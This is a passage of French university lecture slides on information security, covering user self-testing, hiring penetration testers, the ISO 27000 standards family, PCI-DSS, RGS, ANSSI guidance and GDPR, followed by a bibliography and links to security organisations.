[email protected] Sécurité Informatique/ March 31, 2018 338 / 381

Page 339: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Aider les utilisateurs à vérifier leur sécurité

Pourquoi ?Leur montrer comment réagissent leurs outils de sécurité (etainsi éviter les "fake").Leur faire prendre conscience de la sécurité,Les rendre autonomes,Les rendre "détecteurs d’incident".

Comment ?Déclencher une alerte avec http://eicar.com pour l’antivirusTester le firewall local avec grc.comVoir le repérage des spams, phishing, etc.

[email protected] Sécurité Informatique/ March 31, 2018 339 / 381

Page 340: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vérifier son e-réputation

Pourquoi ?Parce que c’est une valeur importante de l’entreprise,Parce ce que cela peut faciliter ou compliquer voire interdire lacommunication avec les clients.

Comment ?Voir la réputation mail avec

mxtoolbox pour savoir si l’on est blacklistébackscatter pour repérer nos refus de mails fautifschez CISCO

Voir la réputation web avecchez McAfeeAvons nous une zone DNS propre ?

[email protected] Sécurité Informatique/ March 31, 2018 340 / 381

Page 341: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les moteurs de recherche

Comment nous voit les moteurs de recherche et Internet ?Google repère-t-il des .bak, .tmp, etc. chez nous ?Quels sont les mots-clés associés à notre domaine ?Peut-on trouver des failles de sécurité associées à nos sites web?

[email protected] Sécurité Informatique/ March 31, 2018 341 / 381

Page 342: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Faire tester sa sécurité

Mais tester soi-même n’est pas toujours suffisant : des entreprisesspécialisées sont là pour cela.

Ce sont des experts (souvent),Ils ont les outils pour (et le droit de les utiliser),Ils délivrent des rapports lisibles,Ils savent ce qu’ils ont le droit de faire.

Règles chez Amazon

[email protected] Sécurité Informatique/ March 31, 2018 342 / 381

Page 343: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Faire tester sa sécurité

Mais attention :Vérifiez que vous avez le droit de tester (serveur mutualisé ouhébergé),Vérifiez la compétence (réputation, autres clients, etc.),Ne pas choisir l’option "je paye uniquement si vous trouvez"(les 0days s’achètent !!!)Définissez bien le périmètre (géographique, opérationnel,temporel etc.),TEST = RISQUE,Plus vous en savez, mieux vous serez servis.

[email protected] Sécurité Informatique/ March 31, 2018 343 / 381

Page 344: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les sujets non traités

Par manque de temps, ces sujets n’ont pas été traités. Ils sontindiqués afin que vous puissiez vous renseigner dessus.

Les VPN (IPSEC, VPN-SSL, openvpn)La sécurisation d’une structure ADLa sécurisation des accès (filaire ou wifi)

Les portails captifs (et leurs limites avec le HTTPS)Le 802.1x (avec le protocole EAP et surtout PEAP)

La gestion des spamsLa gestion du phishing

Habituer ses utilisateursLimiter les dégâts (détection de l’origine des connexions)

La lutte antiviraleLes limites des antivirusLa détection et le blocage post-infection (DNS, Squidguard)

[email protected] Sécurité Informatique/ March 31, 2018 344 / 381

Page 345: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les normes sécurité

Les normes de sécurité

[email protected] Sécurité Informatique/ March 31, 2018 345 / 381

Page 346: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les normes sécurité

Pourquoi ?Besoin de définir des bonnes pratiques (pas de notion d’absolu!)Besoin de parler de la même choseBesoin de certification (évaluation) commune

Evaluation des hommes (pour le recrutement)Evaluation des entreprises (pour la publicité, ou les cercles deconfiance)

Appliquer à la sécurité les principes de la qualité

[email protected] Sécurité Informatique/ March 31, 2018 346 / 381

Page 347: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La qualité

C’est quoi ?Tradition anglo-saxonneObjectif : s’améliorer, RIEN DE PLUSRoue de deming (PDCA)

Plan : je prévois ce que je vais faireDo : je fais ce que j’ai prévuCheck : je vérifie (mesure) que j’ai fait ce que j’ai prévuAct : je constate ce qui n’a pas marché pour le corrigerOn recommence

Concept associé aux normes ISO 9001Ce sont des documents payants à récupérer sur le site de l’ISO: 100 à 150 €

[email protected] Sécurité Informatique/ March 31, 2018 347 / 381

Page 348: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La qualité : sous-entendus

On écrit ce que l’on veut faireOn écrit ce que l’on faitOn définit des indicateurs pour mesurer ce que l’on faitLe modèle PDCA s’applique de manière "fractale"

[email protected] Sécurité Informatique/ March 31, 2018 348 / 381

Page 349: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les normes ISO 27000

Pourquoi ?ISO 27000 : Le vocabulaireISO 27001 : Le système de gestion de la sécurité SMSIISO 27002 : Les bonnes pratiques de la sécuritéISO 27003 : Installation d’un SMSIISO 27004 : Indicateurs et tableaux de bordISO 27005 : La gestion du risqueISO 27006 : Les audits de sécuritéISO 27007 : Guide pour l’audit d’un SMSI

[email protected] Sécurité Informatique/ March 31, 2018 349 / 381

Page 350: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les normes ISO 27000 sectorielles

ISO 27011 : Guide pour le secteur des télécommunicationsISO 27032 : CybersécuritéISO 27033 : Sécurité des réseaux informatiquesISO 27034 : Sécurité applicativeISO 27799 : Guide pour le secteur de la santéPlus les autres (ISO 27012, ISO 27013, ...)

[email protected] Sécurité Informatique/ March 31, 2018 350 / 381

Page 351: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27000

S’occupe des définitions et du vocabulairePubliée en 2009 et révisée en 2012Ne donne pas lieu à une certificationPermet de parler de la même chose

Risque ?Menace ?Vulnérabilité ?

[email protected] Sécurité Informatique/ March 31, 2018 351 / 381

Page 352: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27001

Mise en place d’un SMSI (Système de Management de la Sécuritéde l’Information)

Publiée en 2005, révisée en 2013Donne lieu à une certification d’organismeC’est quasiment une méta-norme qui référence les autresLa sécurité c’est "ni trop, ni trop peu"Cette certification peut être "fumigène" : choix du périmètreet des contraintes de sécuritéen aout 2007 : 5 certif françaises, 73 allemandes, 2280japonaises

[email protected] Sécurité Informatique/ March 31, 2018 352 / 381

Page 353: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27002

Ensemble de bonnes pratiques de la sécuritéPubliéeex norme ISO 17799133 mesures à prendre (mais pas toutes, car pas toujoursadaptées !)11 chapitres39 objectifs

[email protected] Sécurité Informatique/ March 31, 2018 353 / 381

Page 354: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27003

Guide d’implémentation d’un SMSIPubliée en 2010

[email protected] Sécurité Informatique/ March 31, 2018 354 / 381

Page 355: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27004

Donne une liste d’indicateurs de sécurité à produireA l’état de DraftNe donne pas lieu à une certification20 indicateurs maximumIndicateurs doivent être associés à des objectifsPas toujours "informatiques"

[email protected] Sécurité Informatique/ March 31, 2018 355 / 381

Page 356: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27005

Tout ce qui tourne autour de la gestion du risque informatique.Ne donne pas les solutions pour diminuer le risque (les autresnormes s’en chargent)Intégré dans la norme ISO31000 (gestion du risque global).Donne lieu à une certification individuelleEn concurrence avec les méthodes Mehari, EbiosDéfinition de mesures de risquesDéfinition de scénarii de menaces

[email protected] Sécurité Informatique/ March 31, 2018 356 / 381

Page 357: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27006

Exigences que doivent remplir les organismes d’audit et decertifications des SMSI.

Publiée et mise à jour en 2011Donne lieu à une certification

[email protected] Sécurité Informatique/ March 31, 2018 357 / 381

Page 358: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27007

Guide pour l’audit d’un SMSIDraftRecueil de bonnes pratiques

[email protected] Sécurité Informatique/ March 31, 2018 358 / 381

Page 359: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27011

Guide pour le secteur des télécommunicationsPublié en 2008

[email protected] Sécurité Informatique/ March 31, 2018 359 / 381

Page 360: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27012

Guide pour le secteur des financesProposée (Stade avant le Draft) puis abandonnée.

[email protected] Sécurité Informatique/ March 31, 2018 360 / 381

Page 361: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27013

Guide pour le secteur de l’industriepubliée en 2012.

[email protected] Sécurité Informatique/ March 31, 2018 361 / 381

Page 362: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27015

Directives pour l’accréditationPubliée en 2012

[email protected] Sécurité Informatique/ March 31, 2018 362 / 381

Page 363: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27016

Audits et revuesPubliée en 2014

[email protected] Sécurité Informatique/ March 31, 2018 363 / 381

Page 364: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27031

Continuité d’activitéPubliée en 2011Basée sur un British standard (BS 25999) et le (BC/DRSS507) singapourien

[email protected] Sécurité Informatique/ March 31, 2018 364 / 381

Page 365: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27032

Cybersécurité (Internet)Publiée en 2012

[email protected] Sécurité Informatique/ March 31, 2018 365 / 381

Page 366: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27033

Sécurité des réseaux informatiquesPubliée de 2009 à 2014 suivant les parties.révision de l’ISO 18028Découpé en 7 parties (27033-1, 27033-2, ...)

[email protected] Sécurité Informatique/ March 31, 2018 366 / 381

Page 367: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27034

Sécurité ApplicativePubliée en 2011

[email protected] Sécurité Informatique/ March 31, 2018 367 / 381

Page 368: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La norme ISO 27799

Guide pour le secteur de la santéPubliée en 2008ISO 27002 spécifique au secteur de la santé

[email protected] Sécurité Informatique/ March 31, 2018 368 / 381

Page 369: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Comment cela s’applique ?

Le coeur est la norme ISO27001 et référence la plupart des autres.C’est un modèle d’amélioration (PDCA)

On peut (doit) commencer petitOn peut (doit) accepter le droit à l’erreur

On fait une analyse de risques de haut niveauOn sélectionne les risques à traiterOn regarde les bonnes pratiques (27002) qui correspondentOn fait une analyse du risque pour le reste (27005)

[email protected] Sécurité Informatique/ March 31, 2018 369 / 381

Page 370: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Quelques liens

http://www.club-27001.fr/ Association pour la promotionde l’ISO 27001http://www.iso27001security.com

http://www.iso27001certificates.com/ Qui est certifié ?

[email protected] Sécurité Informatique/ March 31, 2018 370 / 381

Page 371: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

D’autres normes

D’autres normes, plus sectorielles existent pour améliorer la sécuritéDCI-DSS et PA-DSS pour le secteur marchant utilisant lescartes bancairesRGS (1 et 2) pour l’état et ses administrations

[email protected] Sécurité Informatique/ March 31, 2018 371 / 381

Page 372: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

DCI-DSS

Payment Card IndustryNorme bancaire réclamée à partir d’un certain C.A. associé àInternetGratuite.135 pages12 conditions à respecter

La moitié en techniqueLa moitié en organisationnel

Actuellement en version 3.0N’est pas une assurance de sécurité, mais de démarchesécurité.N’empêche absolument pas de se faire pirater du sol auplafond.

[email protected] Sécurité Informatique/ March 31, 2018 372 / 381

Page 373: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

RGS

Référentiel général de sécurité (RGS)Version 2 publiée le 13 juin 2014, applicable depuis le 1erjuillet 2014Concerne les téléservices de l’état.

Règles sur les applications webRègles sur les certificats

Document25 pages5 annexes sur les certificats (de 14 à 89 pages)3 annexes sur les mécanismes cryptographiques (de 29 à 63pages)1 annexe sur les prestataires d’audit

[email protected] Sécurité Informatique/ March 31, 2018 373 / 381

Page 374: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Guide d’hygiène informatique

Rédigée par l’ANSSI40 règles50 pagesPas une norme, uniquement des bonnes pratiquesInapplicable en totalité.Mais quelques évidences... pas toujours appliquées.

[email protected] Sécurité Informatique/ March 31, 2018 374 / 381

Page 375: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

PSSI Etat

Publiée le 17 juillet 2014Version 1.042 pages très succintesne concerne que les SI "classiques"doit être appliquée dans les 3 ans après la publication

[email protected] Sécurité Informatique/ March 31, 2018 375 / 381

Page 376: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La RGPD

Règlement Général de Protection des Donnéesou GDPR (General Data Protection Regulation)Applicable à partir du 25 mai 2018Directive européenne (applicable directement)Concerne la protection des données privées, pas la sécurité

mais cela l’impliqueCréé un DPO (Data Protection Officer)

mais qui ne doit pas être le RSSI (Jugement Allemand)

Implique une analyse d’impact (PIA) à partir de certainesdonnées.

[email protected] Sécurité Informatique/ March 31, 2018 376 / 381

Page 377: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La RGPD

Les données à caractère personnel doivent être« traitées de manière licite, loyale et transparente au regard dela personne concernée ».« collectées pour des finalités déterminées, explicites etlégitimes, et ne pas être traitées ultérieurement d’une manièreincompatible avec ces finalités ».« adéquates, pertinentes et limitées à ce qui est nécessaire auregard des finalités pour lesquelles elles sont traitées ».« exactes et, si nécessaire, tenues à jour », sachant que toutesles mesures raisonnables seront prises pour corriger lesinexactitudes.« conservées sous une forme permettant l’identification despersonnes concernées pendant une durée n’excédant pas cellenécessaire au regard des finalités pour lesquelles elles sonttraitées (sauf hypothèse d’archivage dans l’intérêt public, derecherche scientifique, historique ou statistique).« traitées de façon à garantir une sécurité appropriée »

[email protected] Sécurité Informatique/ March 31, 2018 377 / 381

Page 378: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Bibliographie

TCP/IP Règles et protocoles (Stevens)Firewalls and Internet Security (Cheswick & Bellovin)Building Internet Firewalls (Chapman & Zwicky)

[email protected] Sécurité Informatique/ March 31, 2018 378 / 381

Page 379: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Quelques revues

MISC (pluridisciplinaire, complexe, reconnue)http://www.miscmag.com

Hackin9 (version française d’un magazine anglais)http://www.hakin9.org/

[email protected] Sécurité Informatique/ March 31, 2018 379 / 381

Page 380: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les organismes pour vous aider

De nombreux organismes ou associations fournissent d’excellentssupports pour améliorer sa sécurité

l’OSSIR http://www.ossir.org

le CLUSIF http://www.clusif.fr

les CLUSIRs : émanations régionales du CLUSIFles CERTs dont le CERTA http://www.ssi.gouv.fr

le SANS http://www.sans.org

la NSA http://www.nsa.gov d’excellents documentstechniques de sécurisationCAIDA http://www.caida.org

l’OWASP http://www.owasp.org

l’assocation Club 27001 http://www.club-27001.fr/

[email protected] Sécurité Informatique/ March 31, 2018 380 / 381

Page 381: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Urlographie : informations

Quelques sites web référents dans le domaine de la sécurité.http://www.nolimitsecu.fr

https://zythom.blogspot.fr/

http://www.hsc.fr

http://www.zataz.com/

http://insecure.org

[email protected] Sécurité Informatique/ March 31, 2018 381 / 381